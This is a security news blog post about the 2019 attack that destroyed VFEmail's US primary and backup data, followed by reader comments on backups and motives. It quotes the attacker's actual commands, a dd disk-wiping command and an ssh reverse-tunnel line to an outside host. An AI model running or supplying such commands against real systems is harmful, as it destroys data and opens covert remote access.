Disaster. There’s no other word for it.
VFEmail, a Milwaukee-based email provider for businesses and end-users since 2001, has revealed that it has suffered a ‘catastrophic’ attack after a hacker breached its systems and wiped out all of the data it was storing on its US-based servers.
A message posted on VFEmail’s website confirms the bleak news:
“We have suffered catastrophic destruction at the hands of a hacker… This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.”
According to VFEmail, it actually spotted the hacker as they were trying to cause even more damage – formatting other mail servers run by the company in the Netherlands.
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019
Fortunately for those customers whose data was stored on servers in the Netherlands, it appears that their backups have not been impacted. But for the rest of VFEmail’s customers the news is not so good…
At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.
— VFEmail.net (@VFEmail) February 11, 2019
US-based users are currently being urged not to try to connect their email clients to VFEmail’s servers, for fear that they might accidentally wipe out the only remaining copy of their email archive on their own computers:
“At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK. If you reconnect your client to your new mailbox, all your local mail will be lost.”
My advice, if you find yourself in this unfortunate pickle, is to back up any local email archive you may have as quickly as possible, before your client gets a chance to synchronise it away.
There will be many angry customers of VFEmail who will be distraught at the thought that years’ worth of irreplaceable personal and business correspondence may have been wiped out. It’s understandable that some might turn their fury towards VFEmail, and ask tough questions about why their systems weren’t better protected to keep the hacker out.
However, I think it’s worth also recognising that VFEmail is a victim too. A business that has been running for almost 20 years has fallen victim to a devastating criminal attack perpetrated by a malicious hacker, one that it will find hard to recover from commercially. Hacking acts like this have real human consequences, both for the companies that are hacked and for their clients.
I can’t help but feel incredible sympathy not only for VFEmail’s customers, but also for VFEmail itself. The firm has found itself targeted by hackers before (in 2015, it was one of several email providers targeted by DDoS extortionists), but has never experienced anything quite as bad as this.
Found this article interesting? Follow Graham Cluley on Twitter or Mastodon to read more of the exclusive content we post.
5 comments on “VFEmail suffers ‘catastrophic’ attack, as hacker wipes email service’s primary and backup data”
It seems a completely random and unprovoked attack. No ransom demands just systematic removal/deletion of services and backup.
My initial thoughts were this has to be an inside job. The understanding of the infrastructure would have had to be gleaned over a considerable period of time.
This might seem to be a demonstration by the hacker to show other providers what they can do if the providers don't pay an extortion fee.
Is this a harbinger of evil yet to come? I'm interested in which vulnerability was actually exploited. My heart goes out to the folks at VFE.
dd(1) is a very valuable but very dangerous command in the wrong hands. This attack is one of the worst instances of defying the hacker ethics I have seen in a long time and it infuriates me on so many levels.
And yes they’re all victims of a cruel attack. However it’s also a very good lesson to those who don’t know – and that includes every victim here:
(1) Backups should not be accessible like this. A backup that’s always online is almost worthless and this is an extremely unfortunate example of this. Similarly, people believe that redundant storage is a backup: it’s not; just because it’s in, say, a RAID doesn’t make it safe from user errors, any more than from malicious actors or from all drives dying at once. This has actually happened to not just me but a long time friend of mine and I know we’re NOT alone here. Imagine no backups or …
(2) No disaster recovery plan.
(3) Redundant backups are a good idea, and in different locations too. And
(4) Never ever ever rely on an organisation to keep your data safe. Never. Remote backups are great but supplementary. And that’s only for having the data another place. There’s still the risk of data breaches.
All around terrible but one hopes that at least some will take the lessons to heart. Sadly often people don’t learn until disaster strikes. Just like people don’t truly appreciate and understand many things that are both easy to forget [they] have and that they’re extremely lucky to have until they are deprived of it. I have always understood this with things like the above but I have been deprived of some of the very basic needs and in fact I still am – yet I had thought I had been deprived of more than I was but I didn’t realise that in fact I had more than I thought. Not until last month.
Treasure and respect and be eternally grateful for those things and people and pets etc. that you have because you never know when it might be too late. It can happen in an instant, but when it’s something you can protect yourself from you absolutely should and need to do it. Trouble is, if you’re unaware of it you’re also unaware that there’s even a problem! Seems obvious but it’s not. Not until you’re affected by deprivation etc.
This attack could have also been intended to wipe out incriminating emails in a way that leaves some room for plausible deniability. If you wanted to wipe out someone else's emails to hide tracks but didn't want that wipe to be clearly targeting them, why not take down the entire platform?